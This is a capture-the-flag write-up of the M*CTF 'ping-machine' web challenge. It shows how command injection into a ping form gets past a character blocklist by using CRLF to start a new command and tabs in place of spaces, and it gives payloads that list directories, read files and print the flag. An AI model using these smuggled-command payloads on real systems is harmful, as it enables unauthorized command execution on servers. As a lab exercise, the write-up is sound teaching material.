M*CTF ping-machine WriteUp (Web) - 954 points

# M*CTF ping-machine WriteUp (Web) - 954 points ## Task description ![Description](https://i.imgur.com/o36s5ou.png) ## Task view ![](https://i.imgur.com/tQk09oZ.png) ## Solution ### Start BurpSuite and catch the request with our data: ![Raw request](https://i.imgur.com/aMDhyDR.png) We can use IPs or domain names. ### Find blocked symbols Some symbols in input data are blocked, so we need to bypass them. ![Blocked symbol](https://i.imgur.com/LWxGUG0.png) Blocked symbols are: * $ * & * | * spaces * ; ### Execute new command To add a new command to payload use CRLF (%0D%0A) between commands. ![CRLF](https://i.imgur.com/qWwrANZ.png) ### Bypass spaces To bypass spaces use tabs (%09). ![Bypass spaces](https://i.imgur.com/OwaB00o.png) As we see all is fine but we have only last line of output. ### ls -la / Since we can't see all the output at once, we will redirect the output to a file and read it line by line (`sed '<number of line>!D' /tmp/test`). ![ls -la /](https://i.imgur.com/vWIKDLY.png) ``` addr=google.com%0D%0Als%09-la%09/%09>%09/tmp/test ``` ![finding flag](https://i.imgur.com/ep6T7tC.png) ``` addr=google.com%0D%0Ased%09'9!D'%09/tmp/test ``` Then read the flag and delete `/tmp/test`. ![flag](https://i.imgur.com/gb9yuBh.png) ``` addr=google.com%0D%0Acat%09/flag_HTDkf ``` ### **Flag:** `MCTF{$p@ce_1N]ec7i0n}`